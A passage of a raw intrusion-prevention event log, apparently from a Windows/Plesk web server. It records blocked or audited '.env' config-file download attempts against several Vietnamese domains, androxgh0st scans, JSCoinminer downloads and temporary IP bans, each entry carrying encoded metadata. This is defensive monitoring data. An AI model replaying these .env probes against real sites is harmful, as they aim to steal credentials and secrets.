0000040a	01dc940fdd8e7e8a	000000ce	0000000f	164a8367	a3b6d7b5	00000002	00000002	00000001	01dc940fb9614aa5	01dc940fb9614aa5	00000001	00000170	[SID: 32066] Audit: Environment Config File Download Attempt attack detected but not blocked. Application path: SYSTEM		SYSTEM	eyJhY3RvciI6eyJ1aWQiOiIwQkQ2QUY3OC0yNkI5LTRGMDktQTg2Ni0zRjE2ODY2N0Y3NUYifSwiY29ubmVjdGlvbiI6eyJjb25uZWN0aW9uX2RpcmVjdGlvbl9pZCI6MX0sImRldGVjdGlvbl91aWQiOiJCOTVFMTNEOC05NDBGLTExRjAtQTI3Ny0wMDE1NUQwNTc4MEMiLCJyZW1lZGlhdGVkIjp0cnVlLCJ0aHJlYXQiOnsiaWQiOjMyMDY2LCJuYW1lIjoiQXVkaXQ6IEVudmlyb25tZW50IENvbmZpZyBGaWxlIERvd25sb2FkIEF0dGVtcHQiLCJyaXNrX2lkIjowLCJ0eXBlX2lkIjo2fX0=			Default	none		00007d42	00010000	00000002	00000002	0000e7e5	00000050	00000000000000000000000000000000	00000000000000000000000000000000	Audit: Environment Config File Download Attempt	http://vanchuyenduongbomailinh.com/.env			14.3.11216.9000	3F12-01/22/2026 00:19:38 127	00000001		0000000000000000000000000000000000000000000000000000000000000000	00000000	00000000	
000003ff	01dc94100fb4edb8	000000ce	0000000f	164a8367	a3b6d7b5	00000002	00000002	00000001	01dc940fea670336	01dc940fea670336	00000001	00000170	[SID: 32066] Audit: Environment Config File Download Attempt attack detected but not blocked. Application path: SYSTEM		SYSTEM	eyJhY3RvciI6eyJ1aWQiOiIwQkQ2QUY3OC0yNkI5LTRGMDktQTg2Ni0zRjE2ODY2N0Y3NUYifSwiY29ubmVjdGlvbiI6eyJjb25uZWN0aW9uX2RpcmVjdGlvbl9pZCI6MX0sImRldGVjdGlvbl91aWQiOiJFQTY0NUZBRi05NDBGLTExRjAtODkwNy0wMDE1NUQwNTc4MEMiLCJyZW1lZGlhdGVkIjp0cnVlLCJ0aHJlYXQiOnsiaWQiOjMyMDY2LCJuYW1lIjoiQXVkaXQ6IEVudmlyb25tZW50IENvbmZpZyBGaWxlIERvd25sb2FkIEF0dGVtcHQiLCJyaXNrX2lkIjowLCJ0eXBlX2lkIjo2fX0=			Default	none		00007d42	00010000	00000002	00000002	00000534	00000050	00000000000000000000000000000000	00000000000000000000000000000000	Audit: Environment Config File Download Attempt	http://microtech.com.vn/.env			14.3.11216.9000	3F12-01/22/2026 00:19:38 127	00000001		0000000000000000000000000000000000000000000000000000000000000000	00000000	00000000	
00000400	01dc941019be3a63	000000ce	0000000f	164a8367	a3b6d7b5	00000002	00000002	00000001	01dc940ff5375378	01dc940ff5375378	00000001	00000170	[SID: 32066] Audit: Environment Config File Download Attempt attack detected but not blocked. Application path: SYSTEM		SYSTEM	eyJhY3RvciI6eyJ1aWQiOiIwQkQ2QUY3OC0yNkI5LTRGMDktQTg2Ni0zRjE2ODY2N0Y3NUYifSwiY29ubmVjdGlvbiI6eyJjb25uZWN0aW9uX2RpcmVjdGlvbl9pZCI6MX0sImRldGVjdGlvbl91aWQiOiJGNTM2N0YzMS05NDBGLTExRjAtOEQ5MS0wMDE1NUQwNTc4MEMiLCJyZW1lZGlhdGVkIjp0cnVlLCJ0aHJlYXQiOnsiaWQiOjMyMDY2LCJuYW1lIjoiQXVkaXQ6IEVudmlyb25tZW50IENvbmZpZyBGaWxlIERvd25sb2FkIEF0dGVtcHQiLCJyaXNrX2lkIjowLCJ0eXBlX2lkIjo2fX0=			Default	none		00007d42	00010000	00000002	00000002	00002938	00000050	00000000000000000000000000000000	00000000000000000000000000000000	Audit: Environment Config File Download Attempt	http://zelusfurniture.vn/.env			14.3.11216.9000	3F12-01/22/2026 00:19:38 127	00000001		0000000000000000000000000000000000000000000000000000000000000000	00000000	00000000	
0000021f	01dc94101d097f25	000000cf	00000007	164a8367	b02f72a7	00000001	00000000	00000001	01dc94101ad572a6	01dc941180762ea6	00000001	00000000	The client will block traffic from IP address 167.114.47.176 for the next 600 seconds (from 2/2/2026 1:49:40 PM to 2/2/2026 1:59:40 PM).
						Default	Administrator	LAKE	00000000	00000000	00000002	00000002	00000000	00000000	00000000000000000000000000000000	00000000000000000000000000000000					14.3.11216.9000	3F12-01/22/2026 00:19:38 127	00000000			00000000	00000000	
000003fc	01dc94103e4e2bde	000000ce	0000000f	164a8367	b02f72a7	00000002	00000002	00000001	01dc94101a33bf9f	01dc94101a33bf9f	00000001	00000170	[SID: 32066] Audit: Environment Config File Download Attempt attack detected but not blocked. Application path: SYSTEM		SYSTEM	eyJhY3RvciI6eyJ1aWQiOiIwQkQ2QUY3OC0yNkI5LTRGMDktQTg2Ni0zRjE2ODY2N0Y3NUYifSwiY29ubmVjdGlvbiI6eyJjb25uZWN0aW9uX2RpcmVjdGlvbl9pZCI6MX0sImRldGVjdGlvbl91aWQiOiIxQTMzOUI1Ny05NDEwLTExRjAtQkQxNC0wMDE1NUQwNTc4MEMiLCJyZW1lZGlhdGVkIjp0cnVlLCJ0aHJlYXQiOnsiaWQiOjMyMDY2LCJuYW1lIjoiQXVkaXQ6IEVudmlyb25tZW50IENvbmZpZyBGaWxlIERvd25sb2FkIEF0dGVtcHQiLCJyaXNrX2lkIjowLCJ0eXBlX2lkIjo2fX0=			Default	none		00007d42	00010000	00000002	00000002	0000d360	00000050	00000000000000000000000000000000	00000000000000000000000000000000	Audit: Environment Config File Download Attempt	http://103.131.74.22/.env			14.3.11216.9000	3F12-01/22/2026 00:19:38 127	00000001		0000000000000000000000000000000000000000000000000000000000000000	00000000	00000000	
000003de	01dc941041a3a720	000000ce	00000003	164a8367	b02f72a7	00000002	00000001	00000001	01dc94101ab87e56	01dc94101ab87e56	00000001	00000160	[SID: 33006] Web Attack: androxgh0st Scan Attempt attack blocked. Traffic has been blocked for this application: SYSTEM		SYSTEM	eyJhY3RvciI6eyJ1aWQiOiIwQkQ2QUY3OC0yNkI5LTRGMDktQTg2Ni0zRjE2ODY2N0Y3NUYifSwiY29ubmVjdGlvbiI6eyJjb25uZWN0aW9uX2RpcmVjdGlvbl9pZCI6MX0sImRldGVjdGlvbl91aWQiOiIxQTg4MEYwNy05NDEwLTExRjAtQkQzOC0wMDE1NUQwNTc4MEMiLCJyZW1lZGlhdGVkIjp0cnVlLCJ0aHJlYXQiOnsiaWQiOjMzMDA2LCJuYW1lIjoiV2ViIEF0dGFjazogYW5kcm94Z2gwc3QgU2NhbiBBdHRlbXB0Iiwicmlza19pZCI6MCwidHlwZV9pZCI6Nn19			Default	none		000080ee	00010000	00000002	00000002	0000d37a	00000050	00000000000000000000000000000000	00000000000000000000000000000000	Web Attack: androxgh0st Scan Attempt	http://103.131.74.22/			14.3.11216.9000	3F12-01/22/2026 00:19:38 127	00000001		0000000000000000000000000000000000000000000000000000000000000000	00000000	00000000	
000003da	01dc941041a3a720	000000ce	00000003	164a8367	b02f72a7	00000002	00000001	00000001	01dc94101abd4449	01dc94101abd4449	00000001	00000160	[SID: 30186] Web Attack: Malicious Scan Request attack blocked. Traffic has been blocked for this application: SYSTEM		SYSTEM	eyJhY3RvciI6eyJ1aWQiOiIwQkQ2QUY3OC0yNkI5LTRGMDktQTg2Ni0zRjE2ODY2N0Y3NUYifSwiY29ubmVjdGlvbiI6eyJjb25uZWN0aW9uX2RpcmVjdGlvbl9pZCI6MX0sImRldGVjdGlvbl91aWQiOiIxQTg4MEYwNi05NDEwLTExRjAtQkQzOC0wMDE1NUQwNTc4MEMiLCJyZW1lZGlhdGVkIjp0cnVlLCJ0aHJlYXQiOnsiaWQiOjMwMTg2LCJuYW1lIjoiV2ViIEF0dGFjazogTWFsaWNpb3VzIFNjYW4gUmVxdWVzdCIsInJpc2tfaWQiOjAsInR5cGVfaWQiOjZ9fQ==			Default	none		000075ea	00010009	00000002	00000002	0000d37a	00000050	00000000000000000000000000000000	00000000000000000000000000000000	Web Attack: Malicious Scan Request	http://103.131.74.22/			14.3.11216.9000	3F12-01/22/2026 00:19:38 127	00000001		0000000000000000000000000000000000000000000000000000000000000000	00000000	00000000	
00000223	01dc94106ce6fabe	000000d3	0000000f	164a8367	90a2b95d	00000001	00000000	00000000	01dc9410474d7059	01dc9410474d7059	00000001	00000000	Active Response that started at 2/2/2026 1:40:54 PM is disengaged. The traffic from IP address 93.185.162.144 was blocked for 600 second(s).
						Default	Administrator	LAKE	00000000	00000000	00000002	00000002	00000000	00000000	00000000000000000000000000000000	00000000000000000000000000000000					14.3.11216.9000	3F12-01/22/2026 00:19:38 127	00000000			00000000	00000000	
000003ff	01dc9410739842ba	000000ce	0000000f	164a8367	a3b6d7b5	00000002	00000002	00000001	01dc94104f90ac42	01dc94104f90ac42	00000001	00000170	[SID: 32066] Audit: Environment Config File Download Attempt attack detected but not blocked. Application path: SYSTEM		SYSTEM	eyJhY3RvciI6eyJ1aWQiOiIwQkQ2QUY3OC0yNkI5LTRGMDktQTg2Ni0zRjE2ODY2N0Y3NUYifSwiY29ubmVjdGlvbiI6eyJjb25uZWN0aW9uX2RpcmVjdGlvbl9pZCI6MX0sImRldGVjdGlvbl91aWQiOiI0RjhFQjM1Ri05NDEwLTExRjAtQTM3NS0wMDE1NUQwNTc4MEMiLCJyZW1lZGlhdGVkIjp0cnVlLCJ0aHJlYXQiOnsiaWQiOjMyMDY2LCJuYW1lIjoiQXVkaXQ6IEVudmlyb25tZW50IENvbmZpZyBGaWxlIERvd25sb2FkIEF0dGVtcHQiLCJyaXNrX2lkIjowLCJ0eXBlX2lkIjo2fX0=			Default	none		00007d42	00010000	00000002	00000002	00008244	00000050	00000000000000000000000000000000	00000000000000000000000000000000	Audit: Environment Config File Download Attempt	http://thunggiay.com.vn/.env			14.3.11216.9000	3F12-01/22/2026 00:19:38 127	00000001		0000000000000000000000000000000000000000000000000000000000000000	00000000	00000000	
00000401	01dc94107a3efe32	000000ce	0000000f	164a8367	a3b6d7b5	00000002	00000002	00000001	01dc941055a310a5	01dc941055a310a5	00000001	00000170	[SID: 32066] Audit: Environment Config File Download Attempt attack detected but not blocked. Application path: SYSTEM		SYSTEM	eyJhY3RvciI6eyJ1aWQiOiIwQkQ2QUY3OC0yNkI5LTRGMDktQTg2Ni0zRjE2ODY2N0Y3NUYifSwiY29ubmVjdGlvbiI6eyJjb25uZWN0aW9uX2RpcmVjdGlvbl9pZCI6MX0sImRldGVjdGlvbl91aWQiOiI1NUEwRTJERC05NDEwLTExRjAtQTQwMS0wMDE1NUQwNTc4MEMiLCJyZW1lZGlhdGVkIjp0cnVlLCJ0aHJlYXQiOnsiaWQiOjMyMDY2LCJuYW1lIjoiQXVkaXQ6IEVudmlyb25tZW50IENvbmZpZyBGaWxlIERvd25sb2FkIEF0dGVtcHQiLCJyaXNrX2lkIjowLCJ0eXBlX2lkIjo2fX0=			Default	none		00007d42	00010000	00000002	00000002	0000f294	00000050	00000000000000000000000000000000	00000000000000000000000000000000	Audit: Environment Config File Download Attempt	http://www.skyworldex.com/.env			14.3.11216.9000	3F12-01/22/2026 00:19:38 127	00000001		0000000000000000000000000000000000000000000000000000000000000000	00000000	00000000	
000003fe	01dc94108791b6cb	000000ce	0000000f	164a8367	a3b6d7b5	00000002	00000002	00000001	01dc9410635a1b7b	01dc9410635a1b7b	00000001	00000170	[SID: 32066] Audit: Environment Config File Download Attempt attack detected but not blocked. Application path: SYSTEM		SYSTEM	eyJhY3RvciI6eyJ1aWQiOiIwQkQ2QUY3OC0yNkI5LTRGMDktQTg2Ni0zRjE2ODY2N0Y3NUYifSwiY29ubmVjdGlvbiI6eyJjb25uZWN0aW9uX2RpcmVjdGlvbl9pZCI6MX0sImRldGVjdGlvbl91aWQiOiI2MzU3NEIzQi05NDEwLTExRjAtOUJDMS0wMDE1NUQwNTc4MEMiLCJyZW1lZGlhdGVkIjp0cnVlLCJ0aHJlYXQiOnsiaWQiOjMyMDY2LCJuYW1lIjoiQXVkaXQ6IEVudmlyb25tZW50IENvbmZpZyBGaWxlIERvd25sb2FkIEF0dGVtcHQiLCJyaXNrX2lkIjowLCJ0eXBlX2lkIjo2fX0=			Default	none		00007d42	00010000	00000002	00000002	0000ea1f	00000050	00000000000000000000000000000000	00000000000000000000000000000000	Audit: Environment Config File Download Attempt	http://sunrisetrans.vn/.env			14.3.11216.9000	3F12-01/22/2026 00:19:38 127	00000001		0000000000000000000000000000000000000000000000000000000000000000	00000000	00000000	
00000404	01dc9410a8dbb7b0	000000ce	0000000f	164a8367	a3b6d7b5	00000002	00000002	00000001	01dc941084a7d401	01dc941084a7d401	00000001	00000170	[SID: 32066] Audit: Environment Config File Download Attempt attack detected but not blocked. Application path: SYSTEM		SYSTEM	eyJhY3RvciI6eyJ1aWQiOiIwQkQ2QUY3OC0yNkI5LTRGMDktQTg2Ni0zRjE2ODY2N0Y3NUYifSwiY29ubmVjdGlvbiI6eyJjb25uZWN0aW9uX2RpcmVjdGlvbl9pZCI6MX0sImRldGVjdGlvbl91aWQiOiI4NEE0QUQ0My05NDEwLTExRjAtODlCOS0wMDE1NUQwNTc4MEMiLCJyZW1lZGlhdGVkIjp0cnVlLCJ0aHJlYXQiOnsiaWQiOjMyMDY2LCJuYW1lIjoiQXVkaXQ6IEVudmlyb25tZW50IENvbmZpZyBGaWxlIERvd25sb2FkIEF0dGVtcHQiLCJyaXNrX2lkIjowLCJ0eXBlX2lkIjo2fX0=			Default	none		00007d42	00010000	00000002	00000002	00007154	00000050	00000000000000000000000000000000	00000000000000000000000000000000	Audit: Environment Config File Download Attempt	http://www.xaylapangiang.com/.env			14.3.11216.9000	3F12-01/22/2026 00:19:38 127	00000001		0000000000000000000000000000000000000000000000000000000000000000	00000000	00000000	
00000404	01dc9410af8084ee	000000ce	0000000f	164a8367	a3b6d7b5	00000002	00000002	00000001	01dc94108a69ddbd	01dc94108a69ddbd	00000001	00000170	[SID: 32066] Audit: Environment Config File Download Attempt attack detected but not blocked. Application path: SYSTEM		SYSTEM	eyJhY3RvciI6eyJ1aWQiOiIwQkQ2QUY3OC0yNkI5LTRGMDktQTg2Ni0zRjE2ODY2N0Y3NUYifSwiY29ubmVjdGlvbiI6eyJjb25uZWN0aW9uX2RpcmVjdGlvbl9pZCI6MX0sImRldGVjdGlvbl91aWQiOiI4QTY4RjEyQy05NDEwLTExRjAtOEEyNC0wMDE1NUQwNTc4MEMiLCJyZW1lZGlhdGVkIjp0cnVlLCJ0aHJlYXQiOnsiaWQiOjMyMDY2LCJuYW1lIjoiQXVkaXQ6IEVudmlyb25tZW50IENvbmZpZyBGaWxlIERvd25sb2FkIEF0dGVtcHQiLCJyaXNrX2lkIjowLCJ0eXBlX2lkIjo2fX0=			Default	none		00007d42	00010000	00000002	00000002	0000d77c	00000050	00000000000000000000000000000000	00000000000000000000000000000000	Audit: Environment Config File Download Attempt	http://www.viking-vietnam.vn/.env			14.3.11216.9000	3F12-01/22/2026 00:19:38 127	00000001		0000000000000000000000000000000000000000000000000000000000000000	00000000	00000000	
00000400	01dc9410af8084ee	000000ce	0000000f	164a8367	a3b6d7b5	00000002	00000002	00000001	01dc94108b1a162b	01dc94108b1a162b	00000001	00000170	[SID: 32066] Audit: Environment Config File Download Attempt attack detected but not blocked. Application path: SYSTEM		SYSTEM	eyJhY3RvciI6eyJ1aWQiOiIwQkQ2QUY3OC0yNkI5LTRGMDktQTg2Ni0zRjE2ODY2N0Y3NUYifSwiY29ubmVjdGlvbiI6eyJjb25uZWN0aW9uX2RpcmVjdGlvbl9pZCI6MX0sImRldGVjdGlvbl91aWQiOiI4QjE2MEVENC05NDEwLTExRjAtOEE2RC0wMDE1NUQwNTc4MEMiLCJyZW1lZGlhdGVkIjp0cnVlLCJ0aHJlYXQiOnsiaWQiOjMyMDY2LCJuYW1lIjoiQXVkaXQ6IEVudmlyb25tZW50IENvbmZpZyBGaWxlIERvd25sb2FkIEF0dGVtcHQiLCJyaXNrX2lkIjowLCJ0eXBlX2lkIjo2fX0=			Default	none		00007d42	00010000	00000002	00000002	00006f36	00000050	00000000000000000000000000000000	00000000000000000000000000000000	Audit: Environment Config File Download Attempt	http://www.nesenmitsu.vn/.env			14.3.11216.9000	3F12-01/22/2026 00:19:38 127	00000001		0000000000000000000000000000000000000000000000000000000000000000	00000000	00000000	
0000021e	01dc9410e81dc82c	000000cf	00000007	164a8367	164a8367	00000001	00000000	00000001	01dc9410e683d721	01dc94124c249321	00000001	00000000	The client will block traffic from IP address 103.131.74.22 for the next 600 seconds (from 2/2/2026 1:55:22 PM to 2/2/2026 2:05:22 PM).
						Default	Administrator	LAKE	00000000	00000000	00000002	00000002	00000000	00000000	00000000000000000000000000000000	00000000000000000000000000000000					14.3.11216.9000	3F12-01/22/2026 00:19:38 127	00000000			00000000	00000000	
00000402	01dc9410fc166bb9	000000ce	0000000f	164a8367	a3b6d7b5	00000002	00000002	00000001	01dc9410d852ee9a	01dc9410d852ee9a	00000001	00000170	[SID: 32066] Audit: Environment Config File Download Attempt attack detected but not blocked. Application path: SYSTEM		SYSTEM	eyJhY3RvciI6eyJ1aWQiOiIwQkQ2QUY3OC0yNkI5LTRGMDktQTg2Ni0zRjE2ODY2N0Y3NUYifSwiY29ubmVjdGlvbiI6eyJjb25uZWN0aW9uX2RpcmVjdGlvbl9pZCI6MX0sImRldGVjdGlvbl91aWQiOiJEODUyNUQ4Ny05NDEwLTExRjAtQUFEMi0wMDE1NUQwNTc4MEMiLCJyZW1lZGlhdGVkIjp0cnVlLCJ0aHJlYXQiOnsiaWQiOjMyMDY2LCJuYW1lIjoiQXVkaXQ6IEVudmlyb25tZW50IENvbmZpZyBGaWxlIERvd25sb2FkIEF0dGVtcHQiLCJyaXNrX2lkIjowLCJ0eXBlX2lkIjo2fX0=			Default	none		00007d42	00010000	00000002	00000002	0000568a	00000050	00000000000000000000000000000000	00000000000000000000000000000000	Audit: Environment Config File Download Attempt	http://www.sunrisetrans.vn/.env			14.3.11216.9000	3F12-01/22/2026 00:19:38 127	00000001		0000000000000000000000000000000000000000000000000000000000000000	00000000	00000000	
00000405	01dc9410ff6e96e5	000000ce	0000000f	164a8367	a3b6d7b5	00000002	00000002	00000001	01dc9410d9d4d734	01dc9410d9d4d734	00000001	00000170	[SID: 32066] Audit: Environment Config File Download Attempt attack detected but not blocked. Application path: SYSTEM		SYSTEM	eyJhY3RvciI6eyJ1aWQiOiIwQkQ2QUY3OC0yNkI5LTRGMDktQTg2Ni0zRjE2ODY2N0Y3NUYifSwiY29ubmVjdGlvbiI6eyJjb25uZWN0aW9uX2RpcmVjdGlvbl9pZCI6MX0sImRldGVjdGlvbl91aWQiOiJEOUQ0MDJERi05NDEwLTExRjAtQUQ3NC0wMDE1NUQwNTc4MEMiLCJyZW1lZGlhdGVkIjp0cnVlLCJ0aHJlYXQiOnsiaWQiOjMyMDY2LCJuYW1lIjoiQXVkaXQ6IEVudmlyb25tZW50IENvbmZpZyBGaWxlIERvd25sb2FkIEF0dGVtcHQiLCJyaXNrX2lkIjowLCJ0eXBlX2lkIjo2fX0=			Default	none		00007d42	00010000	00000002	00000002	0000539c	00000050	00000000000000000000000000000000	00000000000000000000000000000000	Audit: Environment Config File Download Attempt	http://thunggiaycarton.com.vn/.env			14.3.11216.9000	3F12-01/22/2026 00:19:38 127	00000001		0000000000000000000000000000000000000000000000000000000000000000	00000000	00000000	
00000db9	01dc94110cb5888f	000000ce	00000007	164a8367	164a8367	00000002	00000001	00000001	01dc9410e5e2c1a4	01dc9410e5e2c1a4	00000001	00000a94	[SID: 31908] Web Attack: JSCoinminer Download 108 attack blocked. Traffic has been blocked for this application: C:\PROGRAM FILES (X86)\PLESK\ADDITIONAL\PLESKPHP56\PHP-CGI.EXE		C:\PROGRAM FILES (X86)\PLESK\ADDITIONAL\PLESKPHP56\PHP-CGI.EXE	eyJhY3RvciI6eyJjbWRfbGluZSI6IlwiQzpcXFByb2dyYW0gRmlsZXMgKHg4NilcXFBsZXNrXFxBZGRpdGlvbmFsXFxQbGVza1BIUDU2XFxwaHAtY2dpLmV4ZVwiIiwiZmlsZSI6eyJjb21wYW55X25hbWUiOiJUaGUgUEhQIEdyb3VwIiwiY3JlYXRlZCI6MTU0NzA1MTY3MjAwMCwiZm9sZGVyIjoiYzpcXHByb2dyYW0gZmlsZXMgKHg4NilcXHBsZXNrXFxhZGRpdGlvbmFsXFxwbGVza3BocDU2XFwiLCJtZDUiOiI4MkM1NjQ1NjdDNkI5MTUxNTE0ODBFQjUxMTU4MDhCRSIsIm5hbWUiOiJwaHAtY2dpLmV4ZSIsInBhdGgiOiJjOlxccHJvZ3JhbSBmaWxlcyAoeDg2KVxccGxlc2tcXGFkZGl0aW9uYWxcXHBsZXNrcGhwNTZcXHBocC1jZ2kuZXhlIiwicHJvZHVjdF9uYW1lIjoiUEhQIiwic2hhMSI6IjVBNzg1MkQyMjk0OTMyMDMzRTc2Q0Q2MDY1M0YyQTM1MkMwNjFGRkMiLCJzaGEyIjoiODNEMjRDOURCNDdBOTUzNjUyQUIyQzg0Njg4Q0M4NTdBMDNCRjBBM0Q1MjU4Nzc1MEJFNTJDMzZDRUNENzc3OSIsInNpZ25hdHVyZV92YWx1ZSI6MTA5OTUxMTYyNzc3Niwic2lnbmF0dXJlX3ZhbHVlX2lkcyI6WzBdLCJ2ZXJzaW9uIjoiNS42LjQwIiwieGF0dHJpYnV0ZXMiOnsicG9ydGFsIjpmYWxzZX19LCJwaWQiOjMyNDA0LCJzZXNzaW9uX2lkIjowLCJzdGFydF90aW1lIjoxNzcwMDE1MDI3MDM1LCJ1aWQiOiIzNEE0NDI5MC1GRkZFLUYxRjAtQjlFQi1FMEQwRjc4NDBDQkIifSwiY29ubmVjdGlvbiI6eyJjb25uZWN0aW9uX2RpcmVjdGlvbl9pZCI6Mn0sImRldGVjdGlvbl91aWQiOiJFNUUwODg5My05NDEwLTExRjAtQTA4MS0wMDE1NUQwNTc4MEMiLCJwYXJlbnQiOnsiY21kX2xpbmUiOiJDOlxcV0lORE9XU1xcU3lzV09XNjRcXGluZXRzcnZcXHczd3AuZXhlIC1hcCBcInN1amNvbS5jb20oZG9tYWluKSgyLjApKHBvb2wpXCIgLXYgXCJ2Mi4wXCIgLWwgXCJ3ZWJlbmdpbmU0LmRsbFwiIC1hIFxcXFwuXFxwaXBlXFxpaXNpcG04NWViZTdhYi1kM2M5LTQ4N2EtODJhYS05MTJmNTVmMzNmMDAgLWggXCJDOlxcaW5ldHB1YlxcdGVtcFxcYXBwcG9vbHNcXHN1amNvbS5jb20oZG9tYWluKSgyLjApKHBvb2wpXFxzdWpjb20uY29tKGRvbWFpbikoMi4wKShwb29sKS5jb25maWdcIiAtdyBcIlwiIC1tIDAgLXQgNSAtdGEgMCIsImZpbGUiOnsiY29tcGFueV9uYW1lIjoiTWljcm9zb2Z0IENvcnBvcmF0aW9uIiwiY3JlYXRlZCI6MTYyMDQ2MTc2MjE5MSwiZm9sZGVyIjoiYzpcXHdpbmRvd3NcXHN5c3dvdzY0XFxpbmV0c3J2XFwiLCJtZDUiOiIzRDI3MjU3NEYzNzhCQTA2RkQyQjg1Q0I3NzlDMDNBQSIsIm5hbWUiOiJ3M3dwLmV4ZSIsInBhdGgiOiJjOlxcd2luZG93c1xcc3lzd293NjRcXGluZXRzcnZcXHczd3AuZXhlIiwicHJvZHVjdF9uYW1lIjoiSW50ZXJuZXQgSW5mb3JtYXRpb24gU2VydmljZXMiLCJzaGExIjoiMTkxN0Y2OUVEMjYwRTUxMzEwMTVGOUE1RDcyMTFBRjcwRjBFQTUzQiIsInNoYTIiOiJBNEUxQTVCMTQ4OUIzMTYwNjRGMDgzQzRDRDdCRkM4M0I3MEVFNDY4NEE0RDk3RDFBRDFDNEU2RDY0ODE2MUEzIiwic2lnbmF0dXJlX2NvbXBhbnlfbmFtZSI6Ik1pY3Jvc29mdCBDb3Jwb3JhdGlvbiIsInNpZ25hdHVyZV9jcmVhdGVkX2RhdGUiOjE3NDgzNTg1NDAwMDAsInNpZ25hdHVyZV9pc3N1ZXIiOiJNaWNyb3NvZnQgV2luZG93cyBQcm9kdWN0aW9uIFBDQSAyMDExIiwic2lnbmF0dXJlX3ZhbHVlIjoxMDk5NTIwNzc0MTk5LCJzaWduYXR1cmVfdmFsdWVfaWRzIjpbMSwyLDMsNSw2LDEzLDE2LDE3LDE4LDIwXSwidmVyc2lvbiI6IjEwLjAuMjAzNDguMSIsInhhdHRyaWJ1dGVzIjp7InBvcnRhbCI6ZmFsc2V9fSwicGlkIjoyNzA1Miwic2Vzc2lvbl9pZCI6MCwic3RhcnRfdGltZSI6MTc3MDAxMTUxNTk0MCwidWlkIjoiNzk0MEZFMDEtRkZFMC1GMUYwLUI5RUItRTBEMEY3ODQwQ0JCIn0sInJlbWVkaWF0ZWQiOnRydWUsInRocmVhdCI6eyJpZCI6MzE5MDgsIm5hbWUiOiJXZWIgQXR0YWNrOiBKU0NvaW5taW5lciBEb3dubG9hZCAxMDgiLCJyaXNrX2lkIjowLCJ0eXBlX2lkIjo2fX0=			Default	none		00007ca4	00010001	00000002	00000002	00000050	0000cfeb	00000000000000000000000000000000	00000000000000000000000000000000	Web Attack: JSCoinminer Download 108	http://geomax.vn/wp-cron.php?doing_wp_cron=1770015260.3767089843750000000000			14.3.11216.9000	3F12-01/22/2026 00:19:38 127	00000001		83D24C9DB47A953652AB2C84688CC857A03BF0A3D52587750BE52C36CECD7779	00000000	00000000	
00000db9	01dc9411135ecdaa	000000ce	00000007	164a8367	164a8367	00000002	00000001	00000001	01dc9410ef8c2dca	01dc9410ef8c2dca	00000001	00000a94	[SID: 31908] Web Attack: JSCoinminer Download 108 attack blocked. Traffic has been blocked for this application: C:\PROGRAM FILES (X86)\PLESK\ADDITIONAL\PLESKPHP56\PHP-CGI.EXE		C:\PROGRAM FILES (X86)\PLESK\ADDITIONAL\PLESKPHP56\PHP-CGI.EXE	eyJhY3RvciI6eyJjbWRfbGluZSI6IlwiQzpcXFByb2dyYW0gRmlsZXMgKHg4NilcXFBsZXNrXFxBZGRpdGlvbmFsXFxQbGVza1BIUDU2XFxwaHAtY2dpLmV4ZVwiIiwiZmlsZSI6eyJjb21wYW55X25hbWUiOiJUaGUgUEhQIEdyb3VwIiwiY3JlYXRlZCI6MTU0NzA1MTY3MjAwMCwiZm9sZGVyIjoiYzpcXHByb2dyYW0gZmlsZXMgKHg4NilcXHBsZXNrXFxhZGRpdGlvbmFsXFxwbGVza3BocDU2XFwiLCJtZDUiOiI4MkM1NjQ1NjdDNkI5MTUxNTE0ODBFQjUxMTU4MDhCRSIsIm5hbWUiOiJwaHAtY2dpLmV4ZSIsInBhdGgiOiJjOlxccHJvZ3JhbSBmaWxlcyAoeDg2KVxccGxlc2tcXGFkZGl0aW9uYWxcXHBsZXNrcGhwNTZcXHBocC1jZ2kuZXhlIiwicHJvZHVjdF9uYW1lIjoiUEhQIiwic2hhMSI6IjVBNzg1MkQyMjk0OTMyMDMzRTc2Q0Q2MDY1M0YyQTM1MkMwNjFGRkMiLCJzaGEyIjoiODNEMjRDOURCNDdBOTUzNjUyQUIyQzg0Njg4Q0M4NTdBMDNCRjBBM0Q1MjU4Nzc1MEJFNTJDMzZDRUNENzc3OSIsInNpZ25hdHVyZV92YWx1ZSI6MTA5OTUxMTYyNzc3Niwic2lnbmF0dXJlX3ZhbHVlX2lkcyI6WzBdLCJ2ZXJzaW9uIjoiNS42LjQwIiwieGF0dHJpYnV0ZXMiOnsicG9ydGFsIjpmYWxzZX19LCJwaWQiOjQ1MDcyLCJzZXNzaW9uX2lkIjowLCJzdGFydF90aW1lIjoxNzcwMDE1MDI4OTcyLCJ1aWQiOiIzNEE0NDI5My1GRkZFLUYxRjAtQjlFQi1FMEQwRjc4NDBDQkIifSwiY29ubmVjdGlvbiI6eyJjb25uZWN0aW9uX2RpcmVjdGlvbl9pZCI6Mn0sImRldGVjdGlvbl91aWQiOiJFRjhBNjE1NS05NDEwLTExRjAtQTQ4Ri0wMDE1NUQwNTc4MEMiLCJwYXJlbnQiOnsiY21kX2xpbmUiOiJDOlxcV0lORE9XU1xcU3lzV09XNjRcXGluZXRzcnZcXHczd3AuZXhlIC1hcCBcInN1amNvbS5jb20oZG9tYWluKSgyLjApKHBvb2wpXCIgLXYgXCJ2Mi4wXCIgLWwgXCJ3ZWJlbmdpbmU0LmRsbFwiIC1hIFxcXFwuXFxwaXBlXFxpaXNpcG04NWViZTdhYi1kM2M5LTQ4N2EtODJhYS05MTJmNTVmMzNmMDAgLWggXCJDOlxcaW5ldHB1YlxcdGVtcFxcYXBwcG9vbHNcXHN1amNvbS5jb20oZG9tYWluKSgyLjApKHBvb2wpXFxzdWpjb20uY29tKGRvbWFpbikoMi4wKShwb29sKS5jb25maWdcIiAtdyBcIlwiIC1tIDAgLXQgNSAtdGEgMCIsImZpbGUiOnsiY29tcGFueV9uYW1lIjoiTWljcm9zb2Z0IENvcnBvcmF0aW9uIiwiY3JlYXRlZCI6MTYyMDQ2MTc2MjE5MSwiZm9sZGVyIjoiYzpcXHdpbmRvd3NcXHN5c3dvdzY0XFxpbmV0c3J2XFwiLCJtZDUiOiIzRDI3MjU3NEYzNzhCQTA2RkQyQjg1Q0I3NzlDMDNBQSIsIm5hbWUiOiJ3M3dwLmV4ZSIsInBhdGgiOiJjOlxcd2luZG93c1xcc3lzd293NjRcXGluZXRzcnZcXHczd3AuZXhlIiwicHJvZHVjdF9uYW1lIjoiSW50ZXJuZXQgSW5mb3JtYXRpb24gU2VydmljZXMiLCJzaGExIjoiMTkxN0Y2OUVEMjYwRTUxMzEwMTVGOUE1RDcyMTFBRjcwRjBFQTUzQiIsInNoYTIiOiJBNEUxQTVCMTQ4OUIzMTYwNjRGMDgzQzRDRDd